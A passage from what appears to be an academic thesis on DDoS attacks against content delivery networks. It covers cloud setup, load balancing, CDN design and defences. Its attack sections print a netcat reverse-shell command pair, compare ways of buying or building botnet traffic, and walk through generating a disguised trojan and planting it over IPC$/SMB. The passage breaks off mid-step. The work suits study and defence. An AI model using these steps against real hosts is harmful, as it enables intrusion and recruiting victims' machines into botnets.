normal user does not need to own a hardware facility like a data center, but instead using
internet to access computer infrastructure services. Customers rent server, data storage
and networks from IaaS service provider.
Cloud servers mainly include following functional components:
Entity: A virtual server, containing CPU, memory, operating system, network configu­
ration, disk and other basic computing components. Calculation performance, memory
performance and applicable business scenarios are determined by entity specifications.
20
Analysis of DDoS attacks against content delivery networks
==PAGE:29==
Specific performance indicators contains CPU cores, memory size, network performance,
etc.
Image: Image provides the operating system for entities, initializes application data and
pre­installs necessary softwares. The operating system supports multiple Linux distribu­
tions and multiple Versions of Windows servers.
Block storage: It provides cloud disk based distributed storage architecture and local
storage based on physical computers.
Snapshot: A cloud disk data status file at some timing points, it is often used for data
backup, data recovery and making custom image. Snapshot is common in virtual ma­
chines as well.
Security group: It is a kind of virtual firewall which is used to set up the network ac­
cess control of the entity and it is convenient to edit security strategies.
Network access control list(NACL): An optional layer of security which acts as a fire­
wall for controlling traffic in and out of a subnet, multiple subnets can be associated with a
single network ACL, but one subnet can be associated with only one network ACL at one
time. Users can define network ACL rules and bind network ACL to switches to achieve
access control of inbound traffic of ECS [Ali20b]. Network ACL has 4 features:
1. ACL rules only filter ECS traffic within the bound switch(including traffic forwarded
by server load balancing clusters to ECS)
2. The rules of network ACL are stateless, after setting the rules of the allowed inbound
requests, the corresponding outbound rules should be defined as well, otherwise requests
may not be able to respond.
3. When network ACL has no rules, all access will be denied with in or out directions.
4. Network ACL is bound to the switch and does not filter traffic between ECS instances
within the same switch.
Difference between network ACL and security group: The network ACL rules bound to the
switch control the flow of data which is allowed into the switch, and the instance­related
security group rules control the flow of data which is allowed into the instance. The basic
differences between network ACLs and security groups are shown in the table 3.1.
network ACL
security group
work on switch
work on server entity
Inbound traffic permitted by specific rules
Inbound traffic permitted automatically
rules are executed in order without checking
rules will be checked before being executed
one switch can be bound with only one ACL
one entity can belong to multiple security groups
Table 3.1: Difference between network ACL and security group
The security layer provided by network ACL and security group was shown in figure 3.3.
Analysis of DDoS attacks against content delivery networks
21
==PAGE:30==
Figure 3.3: Security layer supported by network ACL and security group
Virtual private cloud network(VPC): a private network on the cloud that is logically com­
pletely isolated. Clients can assign private network IP address ranges, configure routing
tables, gateways, etc.
ECS servers belong to Parasitic architecture [Ali20c], multiple clients share the same host.
If requiring to have exclusive access to all the physical resources of a cloud host, clients
have to rent DDH(dedicated host). The difference between shared host and dedicated
host was shown in figure 3.4.
22
Analysis of DDoS attacks against content delivery networks
==PAGE:31==
Figure 3.4: Internal topology of shared host and delicated host
ECS have a significant feature: elasticity. The biggest advantage of cloud computing is
its elasticity and flexibility. Operator­class company has the ability to create IT resources
required by a small or medium­sized company in few minutes, which ensures that most
businesses built on the cloud can withstand huge business volume pressure. Elasticity
includes calculating elasticity, storage elasticity and network elasticity. For calculating
elasticity, the configuration of ECS can be changed freely according to the increase or
decrease of the business volume. For storage elasticity, new cloud disks can be created
and mounted on the entity as a data disk. Each VPC network has at least one router, a
private IP address and a switch. So it is flexible to select IP address ranges, configure
routing table and gateways. VPC basic structure was shown in figure 3.5.
Analysis of DDoS attacks against content delivery networks
23
==PAGE:32==
Figure 3.5: network structure of virtual private network
3.3
NAT gateway
NAT gateway of AliCloud as a enterprise­class public network gateway can provide NAT
proxy(SNAT and DNAT) with 10 Gbps level of forwarding capability and disaster recovery
ability. It requires to be bound with a public IP address to work normally. In detail, SNAT
provides a proxy service to access the public network for ECS entities without public IP
in the virtual Private Network(VPC) and DNAT maps public IP address binding on NAT
gateways to ECS entities within VPC to enable ECS entities to provide services to the
public network.
24
Analysis of DDoS attacks against content delivery networks
==PAGE:33==
4
High concurrency problem and
introduction of CDN
Before talking about CDN, it is necessary to mention a system architecture for large­sized,
highly concurrent and heavy loading websites. A small website, like personal website, can
be implemented by using the most simple HTML static pages, to achieve beautification
effect, cooperating with some pictures stored in a directory, such websites on the sys­
tem architecture, performance requirements are simple. With the development of internet
business, website related technology has been subdivided into many aspects, from hard­
ware to software, programming languages, databases, web servers, firewall and other
fields which have strict requirements.
4.1
Highly concurrency problem
For large­sized web sites, such as web portals. When facing a large amount of user ac­
cess, high concurrent requests, the basic solution focuses on a few steps: using a high­
performance server, a high­performance database, an efficient programming language
and a high­performance web container. However, apart from these aspects, there is no
fundamental solution to the high load and high concurrency problems [Li06a].
High load problem can be divided into front­end and back­end load problem. Front­end
load mainly refers to images, videos and other web resources required to be loaded, when
user requests at the peak level, the page loading becomes extremely slow. Back­end load
problem refers to data calculating and database load, for example, for an e­commercial
website, in addition to deal with huge user data, there are a large number of orders and
settlement data as well.
High concurrency is a common problem for all websites with high traffic, concurrency
means being able to serve multiple requests at the same time. For instance, if the con­
figuration of concurrency of a server is 200, then at any time, only 200 users are allowed
to access the website at the same time. If traffic is over that number, users can not open
the website, or even worse that server will crash down.
Before listing several practical solutions to solve these problems. Three server struc­
tures should be introduced.
Stand­alone computer structure: When a system is small, all the codes are in one
project, then the project is deployed on a server. All services for the entire porject are
provided by this server. This is the stand­alone mode, the disadvantages are obvious.
Single computer has limited power of processing, when business grow to a certain extent,
the hardware resources of a single computer will not be able to meet business demands.
Clustering structure: When processing ability of single computer reaches a bottleneck,
making several copies of each singleton will create a “cluster”. Each server in the cluster
is called a “node”, and all the nodes make up a cluster. Each node provides the same
service and hardware resources so that processing performance will be increased sev­
Analysis of DDoS attacks against content delivery networks
25
==PAGE:34==
eral times. Nodes with low load determine which nodes are responsible for specific user
requests. Then all the nodes share the traffic pressure and make the overall processing
more efficient. To implement this function, it is required to add a “dispatcher” role for all
nodes, which receives all requests from users and then decides which nodes to process
the requests based on the current load on all nodes. This “dispatcher” is load balancer.
The advantage of cluster structure is that system can be expanded easily. If the cur­
rent system fails as business grows, add more nodes to the cluster. However, when
system business rises to a certain point, no matter how many nodes added, the overall
performance of the cluster will not seem to be improved significantly. At that moment,
microservice structure is needed.
Distributed structure: From stand­alone structure to cluster structure, implementation
codes do not need to be modified, what should do is just deploy more servers and run the
same codes on nodes. However, from cluster structure to microservice structure requires
relatively huge modifications. Usually, as advice, at the beginning of designing system,
microservice structure should be applied. Distributed structure divides a complete system
into independent subsystems according to the business functions. In distributed structure,
each subsystem is called “service”. These subsystems can run independently in the web
container and communicate with each other via RPC(Remote procedure call) mode. For
instance, suppose an online mall needs to be developed, according to the idea of mircro­
service, the whole system will be divided into several independent services referring to
functional modules, such as user service, product service, order service, background
management service, data analysis service, etc. If there are dependencies between ser­
vices, then they can be called via RPC.
4.2
Performance optimization of websites
From the perspective of low cost, high performance and high scalability, 4 possible solu­
tions are listed below:
1. HTML staticization
The most efficient and least costly page is the pure static HTML page, so try to make web
pages as static as possible is one of the solution. But for a website with a lot of content
required updated frequently, it is impossible to implement all of them manually, so most
companies prefer common CMS(content management system) information release sys­
tem which provides website authoring, collaboration and administration tools that helps
users with little knowledge of web programming languages create and manage websites.
However, there exists vulnerabilities in some old versions of CMS like SQL injection and
file uploading vulnerability.
2. Separation of images and webpages
For web server, no matter Apache, IIS or any other container, images consumes most
resources. So it is necessary to separate images from the page. This is basically the
strategy adopted by large websites, which all have independent image servers. Such
architecture reduces the pressure on the server system when dealing with page access
requests and ensures that system does not crash down due to image problems.
3. Cash
There are different types of cashes, such as architecture cash, web application cash and
26
Analysis of DDoS attacks against content delivery networks
==PAGE:35==
web developing language cash. Here only talk about Architecture cash, different contain­
ers have their own cash module. Apache has its own mod_proxy cash module, besides
that, use additional Squid deployed as cash servers. Both of them can effectively improve
Apache’s access responsiveness.
4. Load balancing
Load balancing [Ali20d] is the final solution to solve high payload and concurrency of large
websites. It is a traffic distribution control service that distributes access traffic to multi­
ple servers at the back end according to forwarding policies. Load balancing extends
the service capability of the application and enhances the availability of the application.
Load balancing virtualizes multiple ECS instances added in the same region into a high­
performance and highly available service pool by setting the virtual service address, and
distributes requests from clients to ECS instances in the backend server pool according
to the forwarding policies. Load balancing defaults to check the health status of ECS
instances in the cloud server pool,automatically isolates abnormal ECS instances like in­
stances with high CPU consumption or wide bandwidth consumption which eliminates the
single point of failure of a single ECS instance.
Normally, Load balancing consists of three components and its basic logic was shown
in figure 4.1:
1. Server load balancer instances: a load balancer instance receives traffic and dis­
tributes it to back­end servers. To use the load balancing services, users have to add at
least one listener and two ECS instances.
2. Listener:Listener is used to examine client requests and forward them to the back­
end server. It also does a health check on the back­end servers.
3. Back­end servers: a set of ECS instances which receive front­end requests. They
can be added individually to the back­end server pool.
Figure 4.1: Basic structure of server load balancer
Load balancing has been developed for many years, there are a lot of professional ser­
vice provider and products to choose. Typical methods are layer 4 hardware or software
switching, layer 7 switching and professional CDN architecture.
Analysis of DDoS attacks against content delivery networks
27
==PAGE:36==
Hardware layer 4 switching: Layer 4 uses the header information of layer 3 and layer
4 packets to identify the business flow according to the application ports of TCP/UDP.
The fourth layer of switching functionality is like virtual IP, pointing to the physical server.
It transports services under a variety of protocols, including HTTP, FTP, Telnet and etc.
Those businesses are based on physical servers and require complex load­balancing
algorithms. In the IP world, service type is determined by the source and destination
TCP/UDP IP addresses and ports.
In hardware layer 4 switching product domain, there are some famous brands such as
Alteon, F5, Berkeley and etc. Even those products are relatively expensive, they can pro­
vide excellent performance and flexible management ability.
Software layer 4 switching: For Software layer 4 switching, LVS(Linux virtual Server)
can be applied which provides real­time disaster response solutions based on heartbeat
line to improve system robustness. It also provides flexible virtual VIP configuration and
management to meet multiple application requirements simultaneously which is essential
for distributed systems. A typical load balancing strategy is that Lighttpd+PHP(FastCGI)+Memcached+Squid.
Layer 4 based switching can not distinguish those contents but layer 7 based switching
can deliver them to different clusters of servers by determining whether the music or image
path is accessed. Products in this domain like F5, Nortel(hardware) and Haproxy(software)
have high prices as well. Layer 7 switching: Layer 7 switching is based on application
layer. Specific applications such as HTTP, HTTPS, Telnet, DNS, etc, can be distinguished
based on the content of received traffic. For example, there are two paths of websites:
a.com/music.. and a.com/image.
4.3
Introduction of CDN
CDN(content delivery network): Content delivery network as the key element of many
successful websites. As a geographically distributed network of proxy servers and their
data centers, many nodes usually deployed in multiple locations compose CDN to reduce
bandwidth costs and provide server acceleration to solve overload problem cause by large
amount of user requests. Those nodes are called “edge servers” as they would be the
closest edge of CDN assets to the end servers. Essentially, CDN aims to deploy cache
server clusters for load balancing.
This virtual distributed network can intelligently cache the content of the source web­
site(including all kinds of dynamic and static resources) to the edge servers in the world
and shares the pressure of the source website. Take AliCloud as an example, its CDN
has over 2800 nodes all over the world covering more than 70 countries. All nodes of
AliCloud are connected to 10G network cards and a single node has storage capacity of
40TB 1.5PB, bandwidth load of 40Gbps 200Gbps and bandwidth reservation of 130Tbps.
Main application scenarios of CDN include:
1. Small image files: if main business of website is to download images and small files
including all types of images, HTML, CSS, JS files, etc.
2. Large file downloading: the main business of websites or apps is large file download­
28
Analysis of DDoS attacks against content delivery networks
==PAGE:37==
ing, with the size of each single file over 20Mb, such as games, various client downloads
and app download stores.
3. Video and Audio data flow: CDN supports MP4, FLV and other mainstream video
formats
4. Website security: Hide the source IP address to protect websites from DOS attack.
So a practical and low cost way to implement load balancing is CDN, CDN can be ex­
panded to a specific professional extent or just reach a basic level. So this network ar­
chitecture strategy has high scalability. Concrete analysis and implementation of CDN
based on Squid clusters will be explained in the next Charpter.
4.4
Lab preparation: deployment of testing target web
servers on cloud
Before conducting DDoS attack, it is necessary to deploy target environment. To make
lab environment closer to real scenarios, Products of AliCloud were selected for pressure
testing. In practice, cloud services renting has such aspects to think of, the first element is
price. Due to research funding limits, it is hard to deploy a website network with complete
hardware or software resources. Enterprise­level network devices and security devices
as introduced before are highly expensive. However, Cloud devices and services are
elastic which provides enough freedom on configuration selection.
The second element is performance and reliability. Some online cloud service providers
may offer old machines even without proper operating system pre­installed so that stored
data can not be recovered as long as servers crash down for only once. The third element
is protection mechanism, lack of protection methods, those cloud servers with weak fire­
walls can be easily attacked and controlled by hackers, not only this host, users’ person
data can be exposed as well.
Here are deployment details of target web servers.
Entities: In this article, ECS with Windows Server 2008 R2 Enterprise 64­bit was rented.
Its concrete configuration information was shown in figure 4.2. All servers were set the
same configuration.
Analysis of DDoS attacks against content delivery networks
29
==PAGE:38==
Figure 4.2: Configuration information of Elastic cloud servers
Network: Two ECS without assigning public IP addresses have been placed in the same
VPC with private IP addresses 172.31.17.130 and 172.31.17.129. Due to fund limits,
their bandwidth available is only 1Mbps. As figure 4.3 of VPC information shown, there
is only one routing table, one switch and two security groups. Two entries have been
added in routing table, the first one is created manually with destination network segment
172.31.16.0/20. The second entry is created by system with destination network segment
100.64.0.0/10 which is another private network inside the whole system. About additional
NAT service here, AliCloud has already deployed default NAT on public network gateways.
So another NAT in VPC is only used for SNAT and DNAT to enforce management and
security of ECS. Due to the high costs of creating and renting additional NAT services,
utilizing the default NAT provided by public network gateways is basically enough. The
only switch associated with routing table directly connects all ECS entities.
30
Analysis of DDoS attacks against content delivery networks
==PAGE:39==
Figure 4.3: Configuration information of Virtual private cloud network
Security group strategies: As shown below, to ensure security and publish rented ECS
as web servers to the external network, inbound rules define ports using TCP protocol:
only 80, 3389 and 22 were open for external access, ICMP was allowed as well. As for
outbound rules, only port 80 was allowed to response. Due to the scale of established
network is small, and there is only one switch to use, so it is unnecessary to set network
ACL again. Security group strategies can achieve the same result. Figure 4.4 showed
the configuration of inbound security group strategy and figure 4.5 showed the outbound
strategy.
Figure 4.4: Inbound security group strategy
Analysis of DDoS attacks against content delivery networks
31
==PAGE:40==
Figure 4.5: Inbound security group strategy
Website publishing: In this article, to simplify the process of establishing website, PHP­
Study was used. PHPStudy is a program debugging integration package in PHP environ­
ment which integrates apache+php+mysql+phpmyadmin+zendoptimizer. Once installed,
users can directly call graphical user interface to use without spending time configuring
anything. As long as clicking apache startup button in option menu. All needed environ­
ments will be deployed automatically. Users can copy their own website projects under
WWW directory. Then contents of website can be published easily. If servers have been
bound with public IP address, websites can be accessed over the internet with that public
IP address. It is suggested to modify default path of index pages otherwise hackers can
easily make malicious tempering on files with default file path.
Domain name service: To make websites access available by using domain names,
two domains were rented. Their authoritative name servers are dns21.hichina.com and
dns22.hichina.com. However, due to the country’s law, all domain names rented should
obtain ICP filing and pass real name authentication. Then transferred domain name was
associated with Public IP address of web servers.
Figure 4.6 showed the A type record entry in DNS record table. As figure 4.7 shown,
target environment was established where websites can be accessed by domain names
or public IP address.
Figure 4.6: Adding A record to map domain name on test server
32
Analysis of DDoS attacks against content delivery networks
==PAGE:41==
Figure 4.7: Test web accessing by domain name
Analysis of DDoS attacks against content delivery networks
33
==PAGE:42==
5
Analysis of complete DDoS attack on
network applying CDN
DDoS attack is called distributed denial of service attack. Multiple hosts or servers are
combined as attack platforms, and malicious programs are used to lunch DDoS attacks on
one or more targets through remote control, which consumes the performance or network
bandwidth of the target servers, thus causing servers to fail to provide services normally.
In other words, Its main purpose is to make the network or system resources exhausted.
Then services will be temporarily interrupted or permanently stopped and be unavailable
to target users. For the good, DDoS can be used for legitimate stress testing for company
and government servers. For the bad, it can be used for blackmail and malicious destruc­
tion. This part will briefly explain a common method to conduct a DDoS attack.
5.1
Basic attacking methodology of DDoS
Basically, DDoS attack is a type of attack based on huge malicious traffic. What DDoS
required most is traffic which can be divided into two types: Outlet and Inlet. Outlet is
related to the speed and size of packets which would be sent out, Inlet is related to the
speed and size of data packets which will receive for servers. Inlet is frequently used in
DDoS attack [Art16].
5.1.1
Traffic collection
There are 4 main methods collected for hackers to obtain traffic.
1. Zombie clusters: The most common attacking traffic is obtained by Zombie hosts.
Hackers use backdoors in conjunction with various security vulnerabilities to gain control
of personal computers and web servers, which are taken control by C&C servers [An18].
C&C server is called command and control server. When conducting penetration tests,
if test clients can get the webshell of a server, they need privilege escalation operations
to achieve root privilege. For example, if the target is a windows server, usually attack­
ers can use EXP(windows vulnerabilities exploit tool) to achieve root. Some EXP can be
directly followed by commands to execute them after overflow(system error) succeeds,
while some EXP can return a CMD of system after overflow succeeds. If so, attackers
need to bounce cmd shell with low privilege back to local host by using “nc” to listen a
specific port locally.
1
nc -vv -lp 9999
2
nc 101.101.101.101 9999 -e cmd.exe
The above command enable attackers to communicate through the establishment of the
shell by “nc”, then send other execution commands. The remote server will reply execu­
tion results when receives commands. At this moment, attackers host is a simple C&C
server as shown in figure 5.1.
34
Analysis of DDoS attacks against content delivery networks
==PAGE:43==
Figure 5.1: Basic logic of C&C server
Hackers mainly connect to the C&C servers to deliver orders to the zombie hosts to ex­
ecute DOS scripts and conduct DoS attack. This type of traffic attack is also called BOT
NET DDoS Attack. The basic logic structure is shown in figure 5.2.
Figure 5.2: Basic logic of Bot Net DDoS attack
2. VPS renting: The benefits of VPS(virtual private server) are low cost, stable traffic and
no legal issues to worry about. However, traffic using VPS has a disadvantage that most
server manufacturers prohibit customers from using VPS servers for behaviors consum­
ing large CPU or bandwidth resources. Because once a VPS takes up too much traffic
for a long time, then it may affect the network speed of other VPS, If customers violates
its regulation, the VPS may be banned and can not be refunded such as AliCloud ECS.
3. Dedicated Host: Most server vendors they do not focus on customers’ online behav­
iors. If customers need dedicated servers which has their own bandwidth and exclusive
IP address. As mentioned before, those dedicated hosts will not affect other network of
VPS but they are relatively expensive.
Analysis of DDoS attacks against content delivery networks
35
==PAGE:44==
4. Online hacking markets traffic purchasing: Some attackers directly bought DDoS
API provided by professional hackers. DDoS services, DDoS application interfaces, bot­
nets, etc. are typically sold on some large dark web platforms around the world. Because
it is too difficult and expensive for individual hackers to deploy their own DDoS platform.
This is the most convenient way to rent enough resources in a short time. To test the
destructive strength of hacker­class DDoS tools, a mobile API based on UDP NTP ampli­
fication DDoS was used to conduct attacks on target websites.
Based on 4 ways to obtain traffic, merits and demerits were shown in table 5.1.
Evaluation factors
API on sale online
VPS
DH
Dark web
Zombies
Price
high
low
high
medium
high
Risk in law
medium
low
low
medium
high
Risk in trading
low
high
low
medium
none
Stability of traffic
­
high
high
low
low
Amount of IP
­
low
low
­
high
Technique threshold
low
medium
medium
low
high
Currency requirement
Bitcoin
normal
normal
Bitcoin
­
Table 5.1: Merits and demerits of various methods to get traffic
5.1.2
Categories of DDoS attacks
Types of top 5 DDoS attacks are Transport layer DDoS attack, Web application DDoS
attack, DNS DDoS attack, connection DDoS attack and Teardrop attack [Lem17].
Fragmentation attack: its sub­categories mainly includes Frag Flood, Stream Flood, IP
fragmentation attack, TCP fragmentation attack, UDP fragmentation attack, etc. Those
attacks as a common form of denial of service attack, in which the machine receiving bro­
ken fragmented packets can not reassemble them due to a bug in TCP/IP fragmentation
mechanism. Fragmentation is necessary when continuous data transmission happens,
because network has a limited size for each IP datagram which is known as the maxi­
mum transmission unit(usually 1500 bytes). So if a datagram larger than this limit has to
be fragmented to be transmitted completely. In IP header in each datagram, there is a
3­byte flag which used to mark fragmentation information details. The first bit is always
0 saved for future use, the second bit indicates whether this IP datagram is fragmented
or not and the last bit represents if this fragment is the ending of whole continuous data­
gram. However, if attackers forge bad IP fragments and send them to servers, servers
may crash down when they can not reassemble small packets into the original datagram.
The vulnerability was useful for old versions of Windows like Windows 7, windows Vista
and earlier versions. The vulnerability was re­patched in the latest version. However,
some operators may still deploy websites on old versions of operating systems due to
fund limits. There still exists possible risks.
Connection DDoS attack: Connection DDoS attack mainly refers to TCP slow­connection
attacks, connection exhaustion attacks, Loic, Hoic, Slowloris and other slow attacks, those
attacks are caused by minimized bandwidth and waste on unrelated services and ports.
For example, Slowloris as an attack tool tries to keep large number of connections to the
victim’s web server open and hold all connections open as long as possible by sending
36
Analysis of DDoS attacks against content delivery networks
==PAGE:45==
partial requests and never completing them. When the concurrent connections are over
the maximum connection pool, servers will deny additional connection attempts from nor­
mal clients finally. However, those connections will last for a while which means it is rel­
atively possible to trace back IP addresses of attacking resources. And those malicious
packets can be easily recognized by firewalls and filtered.
DNS DDoS attack: Attack contains DNS request flood, DNS response flood,false+real
source DNS query flood, authoritative domain name server attack, local domain name
server attack, etc. Take DNS query as an example, basically, attackers conduct real
query requests which belong to normal business actions. However, if multiple dummy
machines send enormous domain name query requests at the same time, the server can
not respond to the normal query request, resulting in denial of service.
As mentioned above, DDoS attacks can be conducted on multiple layers. Currently, DDoS
attacks are mainly these two categories: namely layer 4(transport layer) and layer 7(ap­
plication layer) according to the seven layers of OSI(open System interconnection).
Transport layer DDoS attack: As most common DDoS sub­attack, it covers SYN flood,
ACK flood, UDP flood, ICMP flood, RST flood, etc. The most typical example is SYN flood
which utilizes three­handshake mechanism of TCP protocol, When the server receives a
SYN request, the server must hold the connection for a certain time using a listening
queue. Therefore, attackers keep sending SYN request to the server without respond­
ing to the SYN+ACK packet, resources of server are exhausted. When listening queue
is full, server will be unable to respond to the request of normal clients, thus achieving
the purpose of service attack. Besides this, this article will focus on another UDP NTP
amplification DDoS attack and analyze its working principles.
Web application DDoS attack: Web application DDoS attack refers to HTTP GET flood,
HTTP POST flood, CC, etc [Qia16]. Generally, application layer attacks completely sim­
ulate user requests which are similar to various search engines and crawlers. Those
attacks do not have strict difference with normal business requests which make it hard to
distinguish. Some of the transactions or webpages consuming huge resources will be the
first attacking target of CC attack. Since today’s attacks are mostly hybrid, frequent oper­
ations that simulate user behavior can be considered as CC attack. For example, some
tickets snap up apps are CC attack, to some extent. CC attacks target the back­end busi­
ness of web applications, which not only lead to denial of service, but also directly affect
the function and performance of web applications such as web response time, database
services, disk reading and writing, etc.
5.1.3
Traffic control
Traffic control can be classified as single DDoS script control, single API with multiple
DDoS scripts control and single CMS or API with multiple API control [Art18].
Single DDoS script control: This type of traffic control is the simplest one which be­
longs to DoS attacks, still can not be called as DDoS attack. Hacker compiles a script
through the source code and then attacks the target site directly. This method is mainly
used during stress test simulation for small­sized websites. Due to the single attack mode
and small data flow, it is not intended for a real DDoS attack. However, those DOS scripts
are the basis which represent the working principle of most DDoS attacks. In label part,
Analysis of DDoS attacks against content delivery networks
37
==PAGE:46==
UDP DOS script will be analyzed in detail.
Single API with multiple DDoS scripts: To complicate the attack and facilitate traffic
management, an API interface is compiled to manage all DDoS traffic uniformly usually
by remote desktop protocol. Or in a easier way, upload batch file with preset tasks by
“net time” DOS(disk operating system) commands to trigger pre­implanted trojan virus,
backdoors or DDoS scripts. As for this step, attacker needs to penetrated personal hosts
or servers successfully and collect them as zombie clusters.
Single CMS(content management system) or API with multiple APIs: For a typical
DDoS attack, many servers are required, so a single API is no longer enough. Each
server will have its own API interface, so it is necessary to rewrite an API to mange all API
interfaces of all servers. When attacking the target site, only one command is needed,
and all the servers will launch various DDoS attacks blocking traffic. The structure of three
control methods is shown in figure 5.3.
Figure 5.3: Methods of managing and allocating traffic
5.2
Current DDoS defending methods
Usually, DDoS defending methods contains such several aspects to mitigate attacks [jes18].
Figure 5.4 shows the cloud security architecture. There are 4 protective layers, the outer­
most layer applies Anti­DDoS IP, domain name cloud resolution and CDN network tech­
nologies. Then the second layer utilizes WAF security devices to filter bad requests. To
make the overall processing more efficient, load balancing will be established based on
the existed servers. As mentioned before, load balancing is significant to solve the prob­
lem of high payload and concurrency of large websites. It does mitigate DDoS attack in
essence and improve the performance of whole network. ECSs as the backend servers in
VPC network of SLB(server load balancing) are finally under protection of network security
38
Analysis of DDoS attacks against content delivery networks
==PAGE:47==
group strategies and network layer ACL(access control list).
Figure 5.4: Cloud security architecture against DDoS attack
Here are the suggestion on different aspects to mitigate DDoS attacks.
1. Reduce exposure, isolate resources and unrelated businesses to reduce risk of attack:
Configure security group: Avoid exposing non­business necessary service ports to the
public network to avoid non­business related requests and access. Apply VPC The logic
isolation within the network is implemented through the VPC of the private network to pre­
vent attacks from zombie machine of internal network.
2. Optimize the business architecture and design the system of disaster recovery switch­
ing. Avoid a single point of failure in a business architecture through load balancing or a
geographically multi­centric architecture. Apply load balancing to implement multi­point
concurrent business access of multiple servers, evenly distribute the user access traffic to
each server, reduce the pressure of a single server, improve the business throughput pro­
cessing capacity, which can effectively mitigate DDoS attack within a certain traffic range.
Another way is to purchase high enough bandwidth which is able to handle requests as
much as possible.
3. Server security reinforcement: Security reinforcement should be carried out for the
operating system and software services on the server to reduce points which could be
attacked and increase the attack cost of the attacker. Ensure that the server’s system
files are latest and update system patches in time. Check all server hosts to see where
visitors are coming from. Filter unnecessary services and ports. For example, for a WWW
server, only port 80 should be open, all other ports should be closed, or set a blocking
policy on the firewall. Limit the number of SYN half connections opened simultaneously,
shorten the timeout of SYN half connections and limit the traffic of SYN and ICMP. Ex­
amine the logs for the network devices and server systems carefully. Any vulnerability or
time change indicates that the server may have been attacked. Limit network file sharing
Analysis of DDoS attacks against content delivery networks
39
==PAGE:48==
beyond the protection of firewall. Reduce the chances for hackers to intercept system
files, if hackers replace it with a Trojan virus, the file transfer function will be destroyed.
Make most of network security devices to protect network resources. When configuring
routers, the configuration policy for traffic control, packet filtering, half connection time­
out, garbage packet dropping, source forged packet dropping, SYN thresholds, ICMP
and UDP broadcasting should be considered. Limit the suspected malicious IP connec­
tion and transmission rate. Record IP addresses which send too much requests in a short
time and marked them in blacklists.
4.Choose appropriate business security solutions As introduced before, for website appli­
cations, such as the common HTTP flood attack. WAF can be used to effective defense
against session and application layer. Similar security devices are like IPS, IDS, layer 4
switches, layer 7 switches, etc.
5.Traffic cleaning On the basis of traditional proxy, certification, detection, rebound, black
and white list, etc, DDoS defence methods should combine IP reputation, network traffic
cleaning, fingerprints detection, user behavior detection and content features inspection
to filter traffic, block threats and ensure the business under sustained attack can still pro­
vide services to the external network.
The concrete solution is implemented by “Anycast” [Ali20e]. Anycast is a networking
addressing and routing methodology in which one destination address has many rout­
ing paths to over 2 endpoints. Routers will choose the desired path based on the hops,
distance, cost, latency or based on the least congested route. Messages accessing an
Anycast address can be routed to a specific set of servers identified by that Anycast ad­
dress. Some DDoS high defense companies uses Anycast to route the traffic received to
the nearest protected cleaning center. With this routing approach, DDoS defense can pro­
vide business with efficient traffic cleaning and elastic processing capabilities when in the
face of high traffic concurrency and network congestion. An Anycast address can route
traffic to multiple data centers. When access traffic arrives at the Anycast IP, the traffic
is distributed to different data centers according to the distribution strategies. In general,
traffic will be distributed to the data center closest to the access source. For example,
an Anycast IP of a instance is 172.x.x.x, all high defense traffic centers will announce
the routing of this IP address. When sending a packet to this IP address, the packet will
go through a series of routers and finally be sent to the node with the shortest path by
checking the available path of each node in the data cleaning centers. When a node’s
server fails and becomes unavailable, the IP will be immediately stopped and announced
as unavailable node, then the packet will still be routed to the nearest service node in
accordance with the principle of shortest distance. Figure 5.5 shows the process of traffic
cleaning by Anycast.
40
Analysis of DDoS attacks against content delivery networks
==PAGE:49==
Figure 5.5: Process of traffic cleaning by Anycast
5.3
Zombie host preparation and personal host penetration
As mentioned before, If attackers want to conduct a DDoS attack based on huge amount
of traffic, they need to collect servers or zombie hosts to reach an amount of traffic. But
due to the limit of bandwidth of each individual computer. Then the number of hosts be­
comes the key of a successful attack. Depends on the scale of the website company,
specific amount of zombie hosts would be used for this attack. So the next part will give
some practical ways to get root of personal computers.
The common way to get root privilege is to implant trojan virus to the targeted host. Even
most current penetration tests target at servers because they have much more value than
personal hosts. Almost all data will be stored in servers. Usually Trojan virus is made up of
client end and server end. Client end is a attacker control platform to provide remote con­
trol for attackers which is to be installed on attacker’s host. As for server end, it is called
trojan virus which is to be hidden on the victim’s host. So hosts which are implanted trojan
virus are called zombie hosts as well. Normally, attackers will collect enough information
before conducting an attack. There are a lot of social engineering toolkits available online
which is a manipulation technique exploiting human error to achieve private information.
It is used in brute force password cracking most. Scanning open ports is necessary as
well.
Analysis of DDoS attacks against content delivery networks
41
==PAGE:50==
5.4
Lab1: Penetration test on person host by exploiting
system vulnerability IPC$
The environment for penetrating a personal host is listed below:
WindowsServer2008(172.31.17.127)–attacker host WindowsServer2008(172.31.17.130)–
targeted victim
Tools: grey pigeon, NTscan
Steps for labs:
1. Connect two windows Server 2008(AliCloud ECS) with virtual switches in VPC. As
mentioned before, AliCloud provides VPC(virtual private network) which contains one
switch, one routing table. So At the beginning, for this lab, two hosts were rented with
private IP address 172.31.17.127 and 172.31.17.130. Both of them were configured in
the same VPC which means they are connected by the virtual switch. Figure 5.6 showed
the configuration information of switch.
Figure 5.6: Configuration of switch for lab 2
2. Configure security group rules and test network connection between two hosts. Then it
is necessary to create a new security group which allows traffic accessing port 445. Figure
5.7 and figure 5.8 show the concrete inbound and outbound rules. Both of hosts should
be put in the same security group, otherwise traffic accessing 445 and traffic replied will
be filtered by firewalls. To make it clear, IP address used for attack are all private IP
address. Port scanning has its limit which can only target at local area network rather
than the public network.
42
Analysis of DDoS attacks against content delivery networks
==PAGE:51==
Figure 5.7: Inbound rule of security group for lab 2
Figure 5.8: Outbound rule of security group for lab 2
3. Generate trojan virus. The tool grey pigeon is a trojan virus generating and zombie
hosts management platform, which can pass through some anti­virus softwares. As figure
5.9 shown, hosts implanted with virus will show on the online hosts menu and all files sys­
tem can be under control. To generate the trojan virus, static IP address of attacker’s host
should be defined before generating virus so that zombie hosts implanted virus can trace
back to the attacker and be under control. Usually, it is difficult to find those trojan virus
because the generating tool can modify the names of virus into some confusing names.
All files have current names, service names and description information which can be
modified and disguised. For example, the virus file can be disguised as IEXPLORE.EXE
process to activate server end.
Analysis of DDoS attacks against content delivery networks
43
==PAGE:52==
Figure 5.9: Generation of trojan virus by grey pigeon
4.IPC$ brute force attack. It is impossible to copy virus file to any host without permission.
To copy the generated virus file to the target host by network, vulnerabilities are always
used to help finish the attack. IPC$ service belongs to Server Message Block(SMB) which
has port number 445. SMB enables users to communicate with remote hosts and servers
so that they can share, open and edit their resources like different types of files. It is a
client­server communication protocol which is commonly used in enterprises. The sim­
ilar file sharing server is FTP(file transfer protocol) server, here the file sharing server
is CIFS(common internet file system) which is invented by Microsoft. Usually, for some
network companies, they offer ftp servers for customers and use CIFS server for private
use. The practical way to use SMB service is to type UNC(a UNC path is the path to a
